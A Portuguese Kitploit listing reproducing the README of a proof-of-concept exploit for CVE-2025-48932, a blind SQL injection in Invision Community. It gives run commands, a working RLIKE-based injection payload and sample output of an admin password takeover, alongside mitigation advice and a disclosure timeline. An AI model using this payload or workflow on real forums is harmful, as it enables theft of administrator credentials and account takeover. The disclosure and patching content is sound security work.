Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-48932---exploit — Exploit de prova de conceito para CVE-2025-48932, uma injeção SQL no Invision Community <= 4.7.20. Extrai credenciais de administrador via SQLi cego e chave de redefinição de senha para tomada de conta. | Kitploit
Ferramentas/GitHubGitHub/xploitgh0st/cve-2025-48932---exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubxploitgh0st/cve-2025-48932---exploit

CVE-2025-48932---exploit

Exploit de prova de conceito para CVE-2025-48932, uma injeção SQL no Invision Community <= 4.7.20. Extrai credenciais de administrador via SQLi cego e chave de redefinição de senha para tomada de conta.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
2há 9 mesesAinda não revisado

Invision Community SQL Injection Exploit (CVE-2025-48932)

Python Version License CVE

Uma prova de conceito que demonstra uma vulnerabilidade de injeção de SQL no Invision Community versões <= 4.7.20.

⚠️ Aviso

Esta ferramenta é fornecida APENAS para fins educacionais e de testes de segurança autorizados.

  • O acesso não autorizado a sistemas de computador é ILEGAL
  • Use esta ferramenta apenas em sistemas que você possui ou para os quais tem autorização explícita por escrito para testar
  • O autor NÃO É RESPONSÁVEL por qualquer uso indevido ou dano causado por esta ferramenta
  • Isso é apenas para pesquisadores de segurança, testadores de penetração e fins educacionais

📋 Índice

  • Descrição da Vulnerabilidade
  • Requisitos
  • Instalação
  • Uso
  • Como Funciona
  • Mitigação
  • Créditos
  • Referências

🔍 Descrição da Vulnerabilidade

ID CVE: CVE-2025-48932
Gravidade: Alta
Pontuação CVSS: A definir
Versões Afetadas: Invision Community 4.x anteriores a 4.7.21

A vulnerabilidade existe no script /applications/calendar/modules/front/calendar/view.php. A entrada do usuário passada através do parâmetro de requisição location no método IPS\calendar\modules\front\calendar\view::search() não é devidamente sanitizada antes de ser usada em consultas SQL.

Isso permite que atacantes remotos não autenticados possam:

  • Extrair dados sensíveis do banco de dados
  • Ler credenciais de administrador
  • Potencialmente assumir o controle da conta de administrador

Pré-requisitos para exploração:

  • O aplicativo Calendário deve estar instalado
  • O recurso de Geolocalização (como Google Maps) deve estar configurado

Nota: Embora vulnerabilidades de injeção de SQL em versões do Invision Community 4.x < 4.7.18 pudessem levar à apropriação da conta de administrador e RCE através da redefinição da senha do administrador, a versão 4.7.18 introduziu uma nova chave de criptografia de segurança no mecanismo de redefinição de senha, tornando esse vetor de ataque mais difícil.

📦 Requisitos

  • Python 3.7 ou superior
  • pip (Gerenciador de pacotes Python)
  • Conexão com a internet
  • Sistema alvo executando Invision Community <= 4.7.20 com:
    • Aplicativo Calendário instalado
    • Recurso de Geolocalização configurado

🚀 Instalação

  1. Clone o repositório:

    root@kitploit:~
    git clone https://github.com/yourusername/invision-sqli-exploit.git
    cd invision-sqli-exploit
    
  2. Instale as dependências:

    root@kitploit:~
    pip install -r requirements.txt
    

💻 Uso

Uso Básico

root@kitploit:~
python invision-sqli-exploit.py -u http://target.com/forum/

Modo Verboso (para depuração)

root@kitploit:~
python invision-sqli-exploit.py -u https://example.com/community/ -v

Argumentos de Linha de Comando

Exemplo de Saída

root@kitploit:~
==================================================
Invision Community <= 4.7.20 SQL Injection Exploit
CVE-2025-48932
==================================================
Target: http://example.com/forum/
==================================================

[*] Obtendo token CSRF...
[+] Token CSRF encontrado: abc123def456...
[*] Passo 1: Extraindo e-mail do administrador...
[*] Extraindo dados: [email protected]
[+] E-mail do administrador: [email protected]

[!] Passo 2: Ação manual necessária!

Por favor, siga estes passos:
1. Navegue para: http://example.com/forum/index.php?/lostpassword/
2. Solicite uma redefinição de senha usando o e-mail: [email protected]
3. Pressione ENTER quando terminar...

[*] Passo 3: Extraindo chave de validação de redefinição de senha...
[*] Extraindo dados: xyz789abc123...
[+] Chave de redefinição: xyz789abc123...
[*] Passo 4: Redefinindo senha do administrador...

==================================================
[+] EXPLORAÇÃO BEM-SUCEDIDA!
==================================================

Credenciais do administrador:
  Email:    [email protected]
  Senha: Pwned1721234567

Agora você pode fazer login em: http://example.com/forum/index.php?/login/

🔬 Como Funciona

O exploit funciona em quatro etapas principais:

1. Extração do Token CSRF

O script primeiro obtém um token CSRF do site alvo, que é necessário para requisições subsequentes.

2. Injeção SQL Cega Baseada em Booleano

Usando um algoritmo de busca binária, o exploit extrai dados do banco de dados caractere por caractere:

  • Testa cada caractere usando consultas SQL condicionais
  • Usa a função RLIKE com padrões regex para detectar condições verdadeiras/falsas
  • Mensagens de erro indicam condições bem-sucedidas

3. Extração do E-mail do Administrador

Consulta a tabela core_members para extrair o endereço de e-mail do administrador.

4. Exploração da Redefinição de Senha

  • O atacante inicia manualmente uma redefinição de senha para a conta de administrador
  • O exploit extrai a chave de validação de redefinição de senha do banco de dados
  • Usa a chave de validação para redefinir a senha do administrador sem acesso ao e-mail

Detalhes Técnicos

Ponto de Injeção:

root@kitploit:~
parâmetro location → calendar/view.php → método search()

Exemplo de Payload:

root@kitploit:~
'))OR(SELECT 1 RLIKE(IF(ORD(SUBSTR((SELECT email FROM core_members WHERE member_id=1),1,1))<128,0x28,0x31)))#

Técnica de Exploração: Injeção SQL cega baseada em booleano usando busca binária para extração eficiente de dados.

🛡️ Mitigação

Para Usuários

Ações Imediatas:

  1. Atualize para a versão 4.7.21 ou superior - Esta versão corrige a vulnerabilidade
  2. Desabilite o aplicativo Calendário se não estiver em uso
  3. Monitore logs de acesso para atividade suspeita
  4. Revise as contas de administrador para acesso não autorizado

Para Desenvolvedores

Práticas de Codificação Segura:

  1. Use consultas parametrizadas/prepared statements - Nunca concatene entradas do usuário em consultas SQL
  2. Validação de entrada - Valide e sanitize todas as entradas do usuário
  3. Princípio do menor privilégio - Os usuários do banco de dados devem ter as permissões mínimas necessárias
  4. Firewall de Aplicação Web (WAF) - Implemente regras de WAF para detectar tentativas de injeção de SQL
  5. Auditorias de segurança regulares - Realize revisões de código e testes de penetração periódicos

Exemplo de Código Seguro:

root@kitploit:~
// Código vulnerável
$location = $_REQUEST['location'];
$query = "SELECT * FROM events WHERE location = '$location'";

// Código seguro
$location = $_REQUEST['location'];
$query = $db->prepare("SELECT * FROM events WHERE location = ?");
$query->execute([$location]);

📅 Cronograma de Divulgação

DataEvento
16 de maio de 2025Fornecedor notificado
27 de maio de 2025Versão 4.7.21 lançada

👏 Créditos

Desenvolvedor:

  • nanda

Nota: Esta é uma implementação independente baseada em informações de vulnerabilidade divulgadas publicamente (CVE-2025-48932)

📚 Referências

  • Detalhes do CVE-2025-48932
  • Site Oficial do Invision Community
  • EDB-ID: 52383

📝 Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para obter detalhes.

🤝 Contribuindo

Contribuições são bem-vindas! Sinta-se à vontade para enviar um Pull Request. Para mudanças significativas, abra uma issue primeiro para discutir o que você gostaria de alterar.

⚖️ Aviso Legal

Esta ferramenta é distribuída sob a Licença MIT. Ao usar este software, você concorda com:

  1. Usá-lo apenas para fins legais e autorizados de teste
  2. Assumir total responsabilidade por suas ações
  3. Não responsabilizar o autor por qualquer uso indevido ou dano
  4. Cumprir todas as leis e regulamentos aplicáveis

Lembre-se: Acesso não autorizado a sistemas de computador é crime na maioria das jurisdições e pode resultar em sérias consequências legais.


Se você descobrir uma vulnerabilidade de segurança, divulgue-a de forma responsável ao fornecedor antes de torná-la pública.

Baixar ferramenta
ArgumentoDescriçãoObrigatório
-u, --urlURL base do Invision Community alvoSim
-v, --verboseAtiva saída detalhada para depuraçãoNão
-h, --helpExibe a mensagem de ajuda e saiNão
28 de maio de 2025
Identificador CVE solicitado
28 de maio de 2025CVE-2025-48932 atribuído
23 de julho de 2025Divulgação pública